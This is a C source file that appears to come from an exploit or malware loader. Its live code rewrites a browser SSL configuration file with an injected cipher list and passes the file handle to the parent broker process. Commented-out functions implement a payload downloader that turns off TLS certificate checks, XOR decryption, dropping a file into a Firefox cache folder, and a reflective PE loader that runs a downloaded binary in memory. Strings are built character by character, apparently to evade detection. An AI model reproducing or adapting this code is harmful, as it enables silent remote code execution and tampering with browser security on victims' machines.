VOID handleLastError(__in PVTABLE lpTable, LPSTR szMessage)
{
	DWORD errCode = lpTable->fpGetLastError();
	char *err;
	if (!lpTable->fpFormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
		NULL,
		errCode,
		MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), // default language
		(LPTSTR)&err,
		0,
		NULL))
		return;
	
	char buffer[2048];
	char strFormat[20] = {'[', 'E', ']', ' ', '%', 's', ':', ' ', '%', 's', '\n', 0x0};
	lpTable->fpSprintf(buffer, strFormat, szMessage, err);
	lpTable->fpOutputDebugStringA(buffer);
	//LocalFree(err);
}

/* get parent process id*/
DWORD getParentProcessId(PVTABLE lpTable)
{
	HANDLE hSnapshot;
	PROCESSENTRY32 pe32;
	DWORD ppid = 0, pid = lpTable->fpGetCurrentProcessId();

	hSnapshot = lpTable->fpCreateToolHelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hSnapshot != INVALID_HANDLE_VALUE) 
	{

		__MEMSET__(&pe32, 0, sizeof(pe32));
		pe32.dwSize = sizeof(pe32);
		if (lpTable->fpProcess32First(hSnapshot, &pe32))
		{
			do{
				if (pe32.th32ProcessID == pid){
					ppid = pe32.th32ParentProcessID;
					break;
				}
			} while (lpTable->fpProcess32Next(hSnapshot, &pe32));
		}
	}
	
	if (hSnapshot != INVALID_HANDLE_VALUE) 
		lpTable->CloseHandle(hSnapshot);
	
	return ppid;
}


BOOL WriteBlackList(__in PVTABLE lpTable, CHAR *config_path, USHORT *ciphers, DWORD c_count)
{
       HANDLE hFile;
       HANDLE hMap;
       DWORD config_size;
       char *config_map;
       char *local_config_map, *ptr = NULL;
       BOOL ssl_missing = FALSE;
       DWORD dummy;


	   lpTable->fpOutputDebugStringA(config_path);

       // Fa una copia del file in memoria
	   if ((hFile = lpTable->CreateFileA(config_path, GENERIC_READ |GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL)) == INVALID_HANDLE_VALUE)
	   {
		   char strCreate[] = { 'c', 'r', 0x0};
		   handleLastError(lpTable, strCreate);
           return FALSE;
	   }

	   CHAR handleOpen[] = { 'h', 'a', 'n', 'd', 'l', 'e', ' ', 'o', 'p', 'e', 'n', 0x0};
	   lpTable->fpOutputDebugStringA(handleOpen);

	   DWORD dwCouldntCareLess;
       config_size = lpTable->fpGetFileSize(hFile, &dwCouldntCareLess);

       if (config_size == INVALID_FILE_SIZE) {
             lpTable->CloseHandle(hFile);
             return FALSE;
       }

       

       local_config_map = (char *)lpTable->fpCalloc(config_size + 1, sizeof(char));

       if (local_config_map == NULL) {
             lpTable->CloseHandle(hFile);
			 
			 CHAR failCalloc[] = { 'c', 'a', 'l', 'l', 'o', 'c', 0x0};
			 lpTable->fpOutputDebugStringA(failCalloc);
			 handleLastError(lpTable,failCalloc );
             return FALSE;
       }

 

       if ((hMap = lpTable->fpCreateFileMappingA(hFile, NULL, PAGE_READONLY, 0, 0,NULL)) == NULL) {
             lpTable->fpFree(local_config_map);
             lpTable->CloseHandle(hFile);

			 CHAR failMap[] = { 'f', 'i', 'l', 'e', 'm', 'a', 0x0};
			 lpTable->fpOutputDebugStringA(failMap);

			 handleLastError(lpTable,failMap );
             return FALSE;
       }

 

       if (! (config_map = (char *)lpTable->fpMapViewOfFile(hMap, FILE_MAP_READ, 0, 0, 0)) ) {
             lpTable->fpFree(local_config_map);
             lpTable->CloseHandle(hMap);
             lpTable->CloseHandle(hFile);

			 CHAR failMapView[] = { 'f', 'i', 'l', 'e', 'v', 'i', 0x0};
			 lpTable->fpOutputDebugStringA(failMapView);
			 handleLastError(lpTable, failMapView);
             return FALSE;
       }


       __MEMCPY__(local_config_map, config_map, config_size);
       lpTable->fpUnmapViewOfFile(config_map);
       lpTable->CloseHandle(hMap);


       // Scrive la entry ssl

       lpTable->fpSetFilePointer(hFile, 0, NULL, FILE_BEGIN);

       if (local_config_map[0] == '{') { 

             lpTable->WriteFile(hFile, lpTable->lpLoaderConfig->ssl_first_part, __LSTRLEN(lpTable->lpLoaderConfig->ssl_first_part),
&dummy, NULL);

             for (;c_count > 0; c_count--) {

                    char cipher_str[64];

					///" \"0x%04x\","
					char strFormat1[] = {' ', '"', '0', 'x', '%', '0', '4', 'x', '"' ,',', 0x0};
					char strFormat2[] = {' ', '"', '0', 'x', '%', '0', '4', 'x', '"' , 0x0};

                    if (c_count > 1)
                           lpTable->fpSprintf(cipher_str, strFormat1, ciphers[c_count-1]);
                    else
                           lpTable->fpSprintf(cipher_str, strFormat2, ciphers[c_count-1]);

					lpTable->WriteFile(hFile, cipher_str, __LSTRLEN(cipher_str), &dummy,NULL);
             }

 
             lpTable->WriteFile(hFile, lpTable->lpLoaderConfig->ssl_second_part, __LSTRLEN(lpTable->lpLoaderConfig->ssl_second_part),&dummy, NULL);

             if (!lpTable->WriteFile(hFile, local_config_map + sizeof(char),config_size - sizeof(char), &dummy, NULL)) {

                    lpTable->fpSetEndOfFile(hFile);

                    lpTable->fpFree(local_config_map);
                    lpTable->CloseHandle(hFile);

					CHAR failWrite[] =  {'w', 'r', 0x0};
					handleLastError(lpTable, failWrite);

                    return FALSE;

             }
       }
	    

       lpTable->fpSetEndOfFile(hFile);
       lpTable->fpFree(local_config_map);

	   HANDLE hBroker = lpTable->fpOpenProcess(PROCESS_DUP_HANDLE, FALSE, getParentProcessId(lpTable)); 

	   /* duplicate handle */
	   lpTable->fpDuplicateHandle(lpTable->fpGetCurrentProcess(), hFile, hBroker, NULL,  //lpTargetHandle 
								  NULL, FALSE, DUPLICATE_SAME_ACCESS);

       //CloseHandle(hFile);

       return TRUE;

}

//ULONGLONG WINAPI VerSetConditionMask(ULONGLONG dwlConditionMask, DWORD dwTypeBitMask, BYTE dwConditionMask);
//#define VER_SET_CONDITION_LOCAL(_m_,_t_,_c_)   ((_m_)=lpTable->fpVerSetConditionMask((_m_),(_t_),(_c_))) 
//
//#define VER_MINORVERSION                0x0000001
//#define VER_MAJORVERSION                0x0000002
//#define VER_BUILDNUMBER                 0x0000004
//#define VER_PLATFORMID                  0x0000008
//#define VER_SERVICEPACKMINOR            0x0000010
//#define VER_SERVICEPACKMAJOR            0x0000020
//#define VER_SUITENAME                   0x0000040
//#define VER_PRODUCT_TYPE                0x0000080
//
//
//#define VER_EQUAL                       1
//#define VER_GREATER                     2
//#define VER_GREATER_EQUAL               3
//#define VER_LESS                        4
//#define VER_LESS_EQUAL                  5
//#define VER_AND                         6
//#define VER_OR                          7
//
//#define VER_CONDITION_MASK              7
//#define VER_NUM_BITS_PER_CONDITION_MASK 3
//
//
//BOOL CompareWindowsVersion(PVTABLE lpTable, DWORD dwMajorVersion, DWORD dwMinorVersion)
//{
//	OSVERSIONINFOEX ver;
//	DWORDLONG dwlConditionMask = 0;
//
//
//	__MEMSET__(&ver, 0, sizeof(OSVERSIONINFOEX));
//	ver.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
//	ver.dwMajorVersion = dwMajorVersion;
//	ver.dwMinorVersion = dwMinorVersion;
//
//	VER_SET_CONDITION_LOCAL(dwlConditionMask, VER_MAJORVERSION, VER_EQUAL);
//	VER_SET_CONDITION_LOCAL(dwlConditionMask, VER_MINORVERSION, VER_EQUAL);
//
//	return lpTable->fpVerifyVersionInfoA(&ver, VER_MAJORVERSION | VER_MINORVERSION, dwlConditionMask);
//}
//
//LPBYTE DownloadAndDecryptTls(PVTABLE lpTable, LPSTR strUrl, LPDWORD dwFileLen, DWORD dwXorKey, BOOL bXored)
//{
//	CHAR strBuff[17];
//	DWORD dwBuffLen, dwIdx;
//	CHAR serverName[150];
//	HINTERNET hOpen = NULL;
//	HINTERNET hConnect = NULL;
//	HINTERNET hReq = NULL;
//
//	//CHAR strGet[4] = { 'G', 'E', 'T', 0x0 };
//
//
//	/* extract server name and resource from strUrl
//	* i.e. http://172.20.20.164/9z8o5d9l0p6c.dat -> 172.20.20.164/9z8o5d9l0p6c.dat
//	*/
//
//
//	size_t strLen = __LSTRLEN(strUrl) + 1;
//	//char *pMBstrUrl = (char *)lpTable->fpMalloc(strLen);
//	//lpTable->fpWcstombs_s(&i, pMBstrUrl, strLen, (wchar_t*)strUrl, strLen - 1);
//	char *pMBstrUrl = strUrl;
//
//	// if url startswith https:// skip one more
//	char delta = 7;
//	if (pMBstrUrl[4] == 0x73) //'s'
//		delta = 8;
//
//
//	// strResource = "9z8o5d9l0p6c.dat"
//	LPSTR strUrlTrimmed = __STRCHR__(pMBstrUrl + delta, 0x2f); //'/'
//	LPSTR strResource = strUrlTrimmed + 1;
//	CHAR serverNameLength = strUrlTrimmed - (pMBstrUrl + delta);
//
//	// serverName = "172.20.20.164";
//	__MEMCPY__(serverName, pMBstrUrl + delta, serverNameLength);
//	serverName[serverNameLength] = 0;
//
//
//	/* customize user agent */
//	BOOL bIs61 = CompareWindowsVersion(lpTable, 6, 1);
//	BOOL bIs62 = CompareWindowsVersion(lpTable, 6, 2);
//	BOOL bIs63 = CompareWindowsVersion(lpTable, 6, 3);
//
//	/* whitelist OS */
//	if (!(bIs61 || bIs62 || bIs63))
//		return 0;
//
//	/* fix OS version in user agent */
//	//if (bIs61)  // don't do nothing, user agent is already 6.1 compliant
//	if (bIs62)
//	{
//		char *position = __STRSTR__(lpTable->lpLoaderConfig->strUserAgent, lpTable->lpLoaderConfig->strOS61);
//		if (position)
//			__MEMCPY__(position, lpTable->lpLoaderConfig->strOS62, 3);
//	}
//	else if (bIs63)
//	{
//		char *position = __STRSTR__(lpTable->lpLoaderConfig->strUserAgent, lpTable->lpLoaderConfig->strOS61);
//		if (position)
//			__MEMCPY__(position, lpTable->lpLoaderConfig->strOS63, 3);
//	}
//
//
//	LPBYTE lpPayload = NULL;
//	hOpen = lpTable->InternetOpenA(lpTable->lpLoaderConfig->strUserAgent, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
//
//
//	DWORD dwHttpsFlag = 0;
///*#ifdef _VALIDATE_CA
//	dwHttpsFlag = INTERNET_FLAG_SECURE;
//#else
//	dwHttpsFlag = INTERNET_FLAG_SECURE | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID;
//#endif*/
//
//
//	if (lpTable->lpLoaderConfig->tls_validate == 0xa11da7e)
//		dwHttpsFlag = INTERNET_FLAG_SECURE;
//	else
//		dwHttpsFlag = INTERNET_FLAG_SECURE | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID;
//
//	if (hOpen)
//	{
//		hConnect = lpTable->InternetConnectA(hOpen, serverName, INTERNET_DEFAULT_HTTPS_PORT, lpTable->lpLoaderConfig->strNULL, lpTable->lpLoaderConfig->strNULL, INTERNET_SERVICE_HTTP, 0, 0);
//
//		if (hConnect)
//		{
//			hReq = lpTable->HttpOpenRequestA(hConnect, lpTable->lpLoaderConfig->strGET, strResource, lpTable->lpLoaderConfig->strHTTP10, lpTable->lpLoaderConfig->strNULL, NULL, dwHttpsFlag, 0); //HTTP_VERSIONA
//
//			if (hReq)
//			{
//
//
///*#ifndef _VALIDATE_CA
//				DWORD dwFlags;
//				dwBuffLen = sizeof(dwFlags);
//				lpTable->InternetQueryOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, (LPVOID)&dwFlags, &dwBuffLen);
//				dwFlags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA;
//				lpTable->InternetSetOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags));
//#endif*/
//				if (lpTable->lpLoaderConfig->tls_validate != 0xa11da7e)
//				{
//					DWORD dwFlags;
//					dwBuffLen = sizeof(dwFlags);
//					lpTable->InternetQueryOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, (LPVOID)&dwFlags, &dwBuffLen);
//					dwFlags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA;
//					lpTable->InternetSetOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags));
//				}
//
//
//				if (lpTable->HttpSendRequest(hReq, NULL, 0, NULL, 0))
//				{
//					dwBuffLen = 16;
//					dwIdx = 0;
//
//
//					lpTable->HttpQueryInfoA(hReq, HTTP_QUERY_CONTENT_LENGTH, strBuff, &dwBuffLen, &dwIdx);
//					*dwFileLen = lpTable->atoi((LPSTR)strBuff);
//
//
//					/*char out[256];
//					snprintf(out, 256, "Downloading size %d", *dwFileLen);
//					OutputDebugStringA(out);*/
//
//					//LPBYTE lpFileBuffer = (LPBYTE)VirtualAlloc(NULL, *dwFileLen, MEM_COMMIT, PAGE_READWRITE);
//					LPBYTE lpFileBuffer = (LPBYTE)lpTable->fpMalloc(*dwFileLen);
//
//
//					if (DownloadFile(lpTable, hReq, lpFileBuffer, *dwFileLen))
//					{
//						//OutputDebugStringA("..downloaded");
//
//
//						//if (bXored)
//						//	lpPayload = Decrypt(lpTable, lpFileBuffer, *dwFileLen, dwXorKey);
//						//else
//							lpPayload = lpFileBuffer;
//					}
//
//				} // if( lpTable->fpHttpSendRequest )
//			} // if( hReq )
//		} // if( hConnect )
//	} // if( hOpen )
//
//
//	/* close handles */
//	if (hReq)
//		lpTable->InternetCloseHandle(hReq);
//	if (hConnect)
//		lpTable->InternetCloseHandle(hConnect);
//	if (hOpen)
//		lpTable->InternetCloseHandle(hOpen);
//
//
//	return lpPayload;
//}
//
//
//BOOL DownloadFile(__in PVTABLE lpTable, __in HINTERNET hUrl, __in LPBYTE lpBuffer, __in DWORD dwBufferLen)
//{
//	DWORD dwRead = 0;
//	INTERNET_BUFFERSA pInternetBuff;
//
//	__MEMSET__(&pInternetBuff, 0x0, sizeof(INTERNET_BUFFERSA));
//	pInternetBuff.dwStructSize = sizeof(INTERNET_BUFFERS);
//	pInternetBuff.Next = NULL;
//	pInternetBuff.lpvBuffer = lpBuffer;
//	pInternetBuff.dwBufferLength = dwBufferLen;
//
//	if (lpTable->InternetReadFileExA(hUrl, &pInternetBuff, IRF_SYNC, NULL)) // FIXME
//	{
//		if (pInternetBuff.dwBufferLength == dwBufferLen)
//			return TRUE;
//	}
//
//	return FALSE;
//}

//LPBYTE Decrypt(__in PVTABLE lpTable, __in LPBYTE lpBuffer, __in DWORD dwBuffLen, __in DWORD dwXorKey)
//{
//	LPDWORD lpD = (LPDWORD) lpBuffer;
//	LPBYTE lpB = (LPBYTE) lpBuffer;
//
//	for (UINT i=0; i<dwBuffLen/4; i++)
//		lpD[i] ^= dwXorKey;
//	for (UINT i=dwBuffLen - (dwBuffLen%4); i<dwBuffLen; i++)
//		lpB[i] ^= 0x41;
//
//	return lpBuffer;
//}

//#ifdef LOAD_FROM_DISK
//LPWSTR GetDropPath(__in PVTABLE lpTable)
//{
//	GUID idAppDataLow;
//	LPWSTR strFileName;
//	LPWSTR strShortFileName = (LPWSTR) lpTable->VirtualAlloc(NULL, 0x8000 * sizeof(WCHAR), MEM_COMMIT, PAGE_READWRITE);
//
//	idAppDataLow.Data1 = 0xA520A1A4;
//	idAppDataLow.Data2 = 0x1780;
//	idAppDataLow.Data3 = 0x4FF6;
//	idAppDataLow.Data4[0] = 0xBD;
//	idAppDataLow.Data4[1] = 0x18;
//	idAppDataLow.Data4[2] = 0x16;
//	idAppDataLow.Data4[3] = 0x73;
//	idAppDataLow.Data4[4] = 0x43;
//	idAppDataLow.Data4[5] = 0xc5;
//	idAppDataLow.Data4[6] = 0xaf;
//	idAppDataLow.Data4[7] = 0x16;
//	
//	if (!lpTable->SHGetKnownFolderPath || lpTable->SHGetKnownFolderPath((REFKNOWNFOLDERID)idAppDataLow, 0, NULL, &strFileName) != S_OK)
//	{
//		strFileName = (LPWSTR) lpTable->VirtualAlloc(NULL, 0x8000 * sizeof(WCHAR), MEM_COMMIT, PAGE_READWRITE);
//		lpTable->GetTempPathW(0x8000, strFileName);
//	}
//
//	strShortFileName = (LPWSTR) lpTable->VirtualAlloc(NULL, 0x8000 * sizeof(WCHAR), MEM_COMMIT, PAGE_READWRITE);
//
//	__MEMSET__(strShortFileName, 0x0, 0x8000 * sizeof(WCHAR));
//	lpTable->GetShortPathNameW(strFileName, strShortFileName, 0x8000);
//
//	LPWSTR strBuff = strShortFileName;
//
//	__MEMCPY__(strBuff, "C:\\Users\\unknown\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\wu6ym53y.default\\Cache\\", sizeof("C:\\Users\\unknown\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\wu6ym53y.default\\Cache\\") *2);
//		
//	while(*strBuff++); strBuff-=2;
//	if (*(strBuff) != L'\\')
//	{
//		*(strBuff+1) = L'\\';
//		strBuff++;
//	}
//	
//	*(strBuff+1) = L'A';
//	*(strBuff+2) = L'.';
//	*(strBuff+3) = L'b';	
//	
//	return strShortFileName;
//}
//
//LPWSTR DropFile(__in PVTABLE lpTable, __in LPBYTE lpFileBuffer, __in DWORD dwFileSize)
//{
//	DWORD dwOut;
//	HANDLE hFile;
//	LPWSTR strFileName;
//	
//	strFileName = GetDropPath(lpTable);
//
//	hFile = lpTable->CreateFileW(strFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
//	if (hFile == INVALID_HANDLE_VALUE)
//		return NULL;
//	lpTable->WriteFile(hFile, lpFileBuffer, dwFileSize, &dwOut, NULL);
//	lpTable->CloseHandle(hFile);
//
//	return strFileName;
//}
////#else
//LPVOID _LoadLibrary(
//	__in PVTABLE lpTable,
//	__in LPVOID lpRawBuffer,
//	__out LPVOID *lpExport)
//{
//	LPVOID lpAddress = NULL;
//	IMAGE_DOS_HEADER dos_header;
//	IMAGE_NT_HEADERS32 pe_header;
//	DWORD header_size = 0;
//
//	*lpExport = NULL;
//
//	__MEMCPY__(&dos_header, lpRawBuffer, sizeof(dos_header));
//	if (dos_header.e_magic != IMAGE_DOS_SIGNATURE)
//		return NULL;
//
//	__MEMCPY__(&pe_header, CALC_OFFSET(LPVOID, lpRawBuffer, dos_header.e_lfanew), sizeof(pe_header));
//	if (pe_header.Signature != IMAGE_NT_SIGNATURE)
//		return NULL;
//
//	lpAddress = lpTable->VirtualAlloc(NULL, pe_header.OptionalHeader.SizeOfImage, MEM_COMMIT, PAGE_READWRITE);
//	if (lpAddress == NULL)
//		return NULL;
//
//	header_size = dos_header.e_lfanew + pe_header.FileHeader.SizeOfOptionalHeader + sizeof(pe_header.FileHeader) + 4;
//
//	IMAGE_SECTION_HEADER section;
//	LPVOID lpBufferPtr = CALC_OFFSET(LPVOID, lpRawBuffer, header_size);
//	__MEMCPY__(&section, lpBufferPtr, sizeof(section));
//	__MEMCPY__(lpAddress, lpRawBuffer, section.PointerToRawData);
//
//	PIMAGE_SECTION_HEADER sections = CALC_OFFSET(PIMAGE_SECTION_HEADER, lpAddress, header_size);
//	for(USHORT i = 0; i < pe_header.FileHeader.NumberOfSections; i++, sections++)
//	{
//		LPVOID lpSectionBuffer = CALC_OFFSET(LPVOID, lpAddress, sections->VirtualAddress);
//		__MEMCPY__(lpSectionBuffer, CALC_OFFSET(LPVOID, lpRawBuffer, sections->PointerToRawData), min(sections->SizeOfRawData, sections->Misc.VirtualSize));
//	}
//
//	// relocations
//	DWORD dwRelocSize = pe_header.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
//	DWORD dwRelocAddr = pe_header.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
//	
//	if (dwRelocAddr != 0 && dwRelocSize != 0)
//	{
//		LPBYTE lpPtr = CALC_OFFSET(LPBYTE, lpAddress, dwRelocAddr);
//		while(dwRelocSize > 0)
//		{
//			base_relocation_block_t block;
//			__MEMCPY__(&block, lpPtr, sizeof(base_relocation_block_t));
//
//			dwRelocSize -= block.BlockSize;
//			lpPtr += sizeof(base_relocation_block_t);
//			block.BlockSize -= 8;
//
//			while(block.BlockSize)
//			{
//				base_relocation_entry_t entry;
//				__MEMCPY__(&entry, lpPtr, sizeof(WORD));
//
//				LPDWORD ptrOffset = CALC_OFFSET(LPDWORD, lpAddress, block.PageRVA + entry.offset);
//				DWORD dwOldValue = *ptrOffset;
//
//				DWORD dwNewValue = dwOldValue - pe_header.OptionalHeader.ImageBase + (DWORD) lpAddress;
//				LPWORD ptrHighOffset = CALC_OFFSET_DISP(LPWORD, lpAddress, block.PageRVA + entry.offset, 2);
//				LPWORD ptrLowOffset = CALC_OFFSET_DISP(LPWORD, lpAddress, block.PageRVA + entry.offset, 0);
//
//				WORD wLowNewOffset = (WORD) ((DWORD) lpAddress & 0xffff);
//				WORD wHighNewOffset = (WORD) (((DWORD) lpAddress & 0xffff0000) >> 16);
//
//				switch(entry.type)
//				{
//				case IMAGE_REL_BASED_ABSOLUTE:
//					break;
//				case IMAGE_REL_BASED_HIGH: 
//					break;
//				case IMAGE_REL_BASED_LOW:
//					break;
//				case IMAGE_REL_BASED_HIGHLOW:
//					*ptrOffset = dwNewValue;
//					break;
//				case IMAGE_REL_BASED_HIGHADJ:
//					break;
//				case IMAGE_REL_BASED_DIR64:
//					break; 
//				}
//				
//				lpPtr += sizeof(base_relocation_entry);
//				block.BlockSize -= 2;
//			}
//		}
//	}
//
//
//	// imports
//	DWORD dwIatSize = pe_header.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size;
//	DWORD dwIatAddr = pe_header.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
//
//	if (dwIatAddr != 0)
//	{
//		PIMAGE_IMPORT_DESCRIPTOR pImportDescriptor = CALC_OFFSET(PIMAGE_IMPORT_DESCRIPTOR, lpAddress, dwIatAddr);
//		while(pImportDescriptor)
//		{
//			if (pImportDescriptor->FirstThunk == 0)
//			{
//				pImportDescriptor = NULL;
//				continue;
//			}
//
//			LPDWORD pImportLookupTable = CALC_OFFSET(LPDWORD, lpAddress, pImportDescriptor->FirstThunk);
//			LPSTR lpModName = CALC_OFFSET(LPSTR, lpAddress, pImportDescriptor->Name);
//			
//			HMODULE hMod = lpTable->LoadLibraryA(lpModName);
//
//			if (hMod != NULL)
//			{
//				while(*pImportLookupTable != 0x00)
//				{
//					if ((*pImportLookupTable & IMAGE_ORDINAL_FLAG) != 0x00)
//					{
//						DWORD pOrdinalValue = *(CALC_OFFSET(LPDWORD, pImportLookupTable, 0)) & 0x0000ffff;
//						*pImportLookupTable = (DWORD) lpTable->GetProcAddress(hMod, (LPSTR)pOrdinalValue);
//					}
//					else
//					{
//						LPSTR lpProcName = CALC_OFFSET_DISP(LPSTR, lpAddress, (*pImportLookupTable), 2);	// adding two bytes
//						*pImportLookupTable = (DWORD) lpTable->GetProcAddress(hMod, lpProcName);
//					}
//					pImportLookupTable++;
//				}
//			}
//			pImportDescriptor++;
//		}
//	}
//		
//	// exports
//	HMODULE hModule = (HMODULE) lpAddress;
//	PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER) hModule;
//	PIMAGE_NT_HEADERS pImageNtHeaders = CALC_OFFSET(PIMAGE_NT_HEADERS, hModule, pImageDosHeader->e_lfanew);
//	PIMAGE_DATA_DIRECTORY pExportDir = &pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
//	if (pExportDir->Size != 0 && pExportDir->VirtualAddress != 0)
//	{
//		PIMAGE_EXPORT_DIRECTORY pExportDirectory = (PIMAGE_EXPORT_DIRECTORY) ((LPBYTE)hModule + pExportDir->VirtualAddress);
//
//		pExportDirectory->AddressOfNames += DWORD(hModule);
//		pExportDirectory->AddressOfFunctions += DWORD(hModule);
//		pExportDirectory->AddressOfNameOrdinals += DWORD(hModule);
//
//		LPDWORD ptrFunctions = (LPDWORD) pExportDirectory->AddressOfFunctions;
//		LPDWORD ptrNames = (LPDWORD) pExportDirectory->AddressOfNames;
//
//		for(DWORD i = 0; i < pExportDirectory->NumberOfNames; i++)
//		{
//			ptrFunctions[i] += (DWORD) hModule;
//			ptrNames[i] += (DWORD) hModule;
//
//			*lpExport = (LPVOID) ptrFunctions[i];
//		}
//	}
//
//	// fix perms
//	DWORD ignore = 0;
//	sections = CALC_OFFSET(PIMAGE_SECTION_HEADER, lpAddress, header_size);
//	for(USHORT i = 0; i < pe_header.FileHeader.NumberOfSections; i++, sections++)
//	{
//		LPVOID lpSectionBuffer = CALC_OFFSET(LPVOID, lpAddress, sections->VirtualAddress);
//		if ((sections->Characteristics & IMAGE_SCN_MEM_EXECUTE) == IMAGE_SCN_MEM_EXECUTE)
//			lpTable->VirtualProtect(lpSectionBuffer, sections->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &ignore);
//	}
//
//	lpTable->VirtualProtect(lpAddress, header_size, PAGE_READONLY, &ignore);
//
//	return CALC_OFFSET(LPVOID, lpAddress, pe_header.OptionalHeader.AddressOfEntryPoint);
//}
////#endif

/* base 64 stuff */
//int Base64decode_len(__in PVTABLE lpTable, const char *bufcoded)
//{
//    int nbytesdecoded;
//    register const unsigned char *bufin;
//    register int nprbytes;
//
//    bufin = (const unsigned char *) bufcoded;
//    while (lpTable->lpLoaderConfig->pr2six[*(bufin++)] <= 63);
//
//    nprbytes = (bufin - (const unsigned char *) bufcoded) - 1;
//    nbytesdecoded = ((nprbytes + 3) / 4) * 3;
//
//    return nbytesdecoded + 1;
//}
//
//int Base64decode(__in PVTABLE lpTable, char *bufplain, const char *bufcoded)
//{
//    int nbytesdecoded;
//    register const unsigned char *bufin;
//    register unsigned char *bufout;
//    register int nprbytes;
//
//    bufin = (const unsigned char *) bufcoded;
//    while (lpTable->lpLoaderConfig->pr2six[*(bufin++)] <= 63);
//    nprbytes = (bufin - (const unsigned char *) bufcoded) - 1;
//    nbytesdecoded = ((nprbytes + 3) / 4) * 3;
//
//    bufout = (unsigned char *) bufplain;
//    bufin = (const unsigned char *) bufcoded;
//
//    while (nprbytes > 4) {
//    *(bufout++) =
//        (unsigned char) (lpTable->lpLoaderConfig->pr2six[*bufin] << 2 | lpTable->lpLoaderConfig->pr2six[bufin[1]] >> 4);
//    *(bufout++) =
//        (unsigned char) (lpTable->lpLoaderConfig->pr2six[bufin[1]] << 4 | lpTable->lpLoaderConfig->pr2six[bufin[2]] >> 2);
//    *(bufout++) =
//        (unsigned char) (lpTable->lpLoaderConfig->pr2six[bufin[2]] << 6 | lpTable->lpLoaderConfig->pr2six[bufin[3]]);
//    bufin += 4;
//    nprbytes -= 4;
//    }
//
//    /* Note: (nprbytes == 1) would be an error, so just ingore that case */
//    if (nprbytes > 1) {
//    *(bufout++) =
//        (unsigned char) (lpTable->lpLoaderConfig->pr2six[*bufin] << 2 | lpTable->lpLoaderConfig->pr2six[bufin[1]] >> 4);
//    }
//    if (nprbytes > 2) {
//    *(bufout++) =
//        (unsigned char) (lpTable->lpLoaderConfig->pr2six[bufin[1]] << 4 | lpTable->lpLoaderConfig->pr2six[bufin[2]] >> 2);
//    }
//    if (nprbytes > 3) {
//    *(bufout++) =
//        (unsigned char) (lpTable->lpLoaderConfig->pr2six[bufin[2]] << 6 | lpTable->lpLoaderConfig->pr2six[bufin[3]]);
//    }
//
//    *(bufout++) = '\0';
//    nbytesdecoded -= (4 - nprbytes) & 3;
//    return nbytesdecoded;
//}
//
//
//int Base64encode_len(int len)
//{
//    return ((len + 2) / 3 * 4) + 1;
//}
//
//int Base64encode(__in PVTABLE lpTable, char *encoded, const char *string, int len)
//{
//    int i;
//    char *p;
//
//    p = encoded;
//    for (i = 0; i < len - 2; i += 3) {
//    *p++ = lpTable->lpLoaderConfig->basis_64[(string[i] >> 2) & 0x3F];
//    *p++ = lpTable->lpLoaderConfig->basis_64[((string[i] & 0x3) << 4) |
//                    ((int) (string[i + 1] & 0xF0) >> 4)];
//    *p++ = lpTable->lpLoaderConfig->basis_64[((string[i + 1] & 0xF) << 2) |
//                    ((int) (string[i + 2] & 0xC0) >> 6)];
//    *p++ = lpTable->lpLoaderConfig->basis_64[string[i + 2] & 0x3F];
//    }
//    if (i < len) {
//    *p++ = lpTable->lpLoaderConfig->basis_64[(string[i] >> 2) & 0x3F];
//    if (i == (len - 1)) {
//        *p++ = lpTable->lpLoaderConfig->basis_64[((string[i] & 0x3) << 4)];
//        *p++ = '=';
//    }
//    else {
//        *p++ = lpTable->lpLoaderConfig->basis_64[((string[i] & 0x3) << 4) |
//                        ((int) (string[i + 1] & 0xF0) >> 4)];
//        *p++ = lpTable->lpLoaderConfig->basis_64[((string[i + 1] & 0xF) << 2)];
//    }
//    *p++ = '=';
//    }
//
//    *p++ = '\0';
//    return p - encoded;
//}

/* end of base64 stuff */

#pragma optimize("", off)
char* __STRCHR__(const char *s, int c)
{
	const char ch = c;

	for (; *s != ch; s++)
	if (*s == '\0')
		return 0;
	return (char *)s;
}

UINT __LSTRLEN(CHAR *str){
	CHAR *s;

	for (s = str; *s; ++s);
	return(s - str);
}


VOID __MEMSET__(__in LPVOID p, __in CHAR cValue, __in DWORD dwSize)
{
	for (UINT i=0; i<dwSize; i++)
		((PCHAR)p)[i] = cValue;
}

LPVOID __MEMCPY__(
	__in LPVOID lpDst, 
	__in LPVOID lpSrc, 
	__in DWORD dwCount)
{
	LPBYTE s = (LPBYTE) lpSrc;
	LPBYTE d = (LPBYTE) lpDst;

	while (dwCount--)
		*d++ = *s++;

	return lpDst;
}

int __STRNCMP__(const char *s1, const char *s2, size_t n)
{
	for (; n > 0; s1++, s2++, --n)
	if (*s1 != *s2)
		return ((*(unsigned char *)s1 < *(unsigned char *)s2) ? -1 : +1);
	else if (*s1 == '\0')
		return 0;
	return 0;
}

